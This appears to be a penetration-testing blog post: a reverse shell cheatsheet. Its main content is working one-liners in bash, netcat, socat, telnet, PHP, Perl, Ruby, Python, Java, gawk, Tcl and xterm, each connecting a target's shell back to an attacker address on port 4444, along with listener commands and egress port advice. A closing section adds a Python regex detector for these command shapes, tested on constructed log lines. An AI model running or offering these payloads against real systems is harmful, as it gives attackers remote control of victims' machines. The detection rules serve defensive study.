Reverse Shell Cheatsheet


December 27, 2016 | Article | 1 Comment

During penetration testing, we might be lucky enough to exploit a command execution vulnerability. Soon afterwards we want an interactive shell to penetrate deeper. Some approaches involve a "login" mechanism, such as adding a new account, an SSH key or a .rhosts file. If those approaches are not viable, the next hop is a shell: either a reverse shell or a shell bound to a TCP port. As stated in the title, we will discuss the former.

Below we curate reverse shells that use various programming languages or tools available on the target machine.

Listening Home

Most network firewall egress filters allow

  • http (tcp port 80)
  • https (tcp port 443)
  • dns (tcp/udp port 53)
  • smtp (tcp port 25)
  • ping (icmp requests and echo replies)

While this is not always true, it can be our initial attempt: set the listening socket on one of those ports. Remember that a reverse shell needs a "home", something on our machine that listens for and communicates with the reverse shell.

The simplest trick at our disposal is using netcat to listen on a socket. Most likely netcat is installed by default.

nc -vlp 4444

Or if we are using socat, we can use this.

socat READLINE,history:/tmp/history.cmds TCP4-LISTEN:4444

Or we can create a redirector on a public-facing machine which forwards the traffic to our system.

Reverse Shell

Bash

exec 5<>/dev/tcp/10.11.1.135/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/10.11.1.135/4444 0>&1
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/10.11.1.135/4444; sh <&196 >&196 2>&196

TCLsh

#!/usr/bin/tclsh
set s [socket <IP> <PORT>];
while {42} {
  puts -nonewline $s "shell>";
  flush $s;
  gets $s c;
  set e "exec $c";
  if {![catch {set r [eval $e]} err]} {
    puts $s $r;
  }
  flush $s;
}
close $s;
echo 'set s [socket <IP> <PORT>];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

PHP

php -r '$sock=fsockopen("10.11.1.135",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.11.1.135",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.11.1.135",4444);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.11.1.135",4444);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.11.1.135",4444);popen("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh 10.11.1.135 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.135 4444 >/tmp/f
/bin/sh | nc 10.11.1.135 4444

Socat

socat TCP:10.11.1.135:4444 EXEC:/bin/bash
socat OPENSSL:10.11.1.135:4444 EXEC:/bin/bash,pty

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.11.1.135 0/tmp/p
telnet 10.11.1.135 80 | /bin/bash | telnet 10.11.1.135 0 443

Perl

perl -e 'use Socket;$i="10.11.1.135";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

For Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.11.1.135:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.11.1.135",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.11.1.135","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e "c=TCPSocket.new('10.11.1.135','4444');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.11.1.135/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.135",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk

#!/usr/bin/awk -f
BEGIN {
   s = "/inet/tcp/0/10.11.1.135/4444"
   while(42) {
      do{
         printf "shell>" |& s
         s |& getline c
         if(c){
            while ((c |& getline) > 0)
               print $0 |& s
            close(c)
         }
      } while(c != "exit")
      close(s)
   }
}
awk 'BEGIN {s = "/inet/tcp/0/10.11.1.135/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

xterm

One of the simplest reverse shells.

xterm -display 10.11.1.135:1

To catch the incoming xterm session, start a nested X server on display :1.

Xnest :1
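From the defender's side, every one-liner above leaves a recognisable process command line. As an added example that is not part of the original cheatsheet, the following Python detector turns those shapes into regex rules and runs them over constructed, generic "key=value" log lines (rule names, log format and sample lines are assumptions for illustration, not real logs):

```python
import re

# Each rule is (name, regex). The patterns are derived from the one-liners
# in the cheatsheet above and are matched against a process command line as
# it would appear in an audit/EDR log. Rule names are hypothetical.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("netcat_exec", re.compile(r"\bnc(at)?\b[^|;&]*\s-e\s")),
    ("fifo_pipe_to_nc", re.compile(r"(mkfifo|mknod\s+\S+\s+p).*\|\s*(nc|ncat|telnet)\b")),
    ("socat_exec", re.compile(r"\bsocat\b.*\bEXEC:")),
    ("scripting_socket_shell", re.compile(
        r"\b(php|perl|python\d?|ruby)\b.*(fsockopen|Socket|socket\.socket|TCPSocket)"
        r".*(/bin/(ba)?sh|exec|popen|dup2)", re.S)),
    ("gawk_inet", re.compile(r"\bawk\b.*/inet/tcp/")),
    ("tcl_socket_shell", re.compile(r"\[socket\s+\S+\s+\S+\].*exec")),
    ("xterm_remote_display", re.compile(r"\bxterm\b.*-display\s+\d{1,3}(\.\d{1,3}){3}:\d+")),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Return (line, matched_rule_names) for each line that triggers a rule."""
    return [(ln, hits) for ln in lines if (hits := classify(ln))]


# Constructed sample log lines in a generic "key=value" style (not real logs).
SAMPLE_LOG = [
    "uid=33 comm=sh cmd=bash -i >& /dev/tcp/10.11.1.135/4444 0>&1",
    "uid=33 comm=nc cmd=nc -e /bin/sh 10.11.1.135 4444",
    "uid=33 comm=sh cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.135 4444 >/tmp/f",
    "uid=1000 comm=nc cmd=nc -vz 10.11.1.135 443",  # benign port check, must not fire
    "uid=33 comm=php cmd=php -r '$sock=fsockopen(\"10.11.1.135\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "uid=1000 comm=xterm cmd=xterm -display 10.11.1.135:1",
    "uid=1000 comm=tar cmd=tar czf /tmp/backup.tgz /var/www",  # benign, must not fire
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(", ".join(hits), "<-", line)
```

The benign netcat port check and the tar job are included so the rules can be checked for false positives alongside the true hits; in practice such rules belong in process-creation telemetry (auditd execve, EDR) paired with egress alerts on the ports listed under "Listening Home".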


About Author

xathrya

A man who is obsessed with low-level technology.
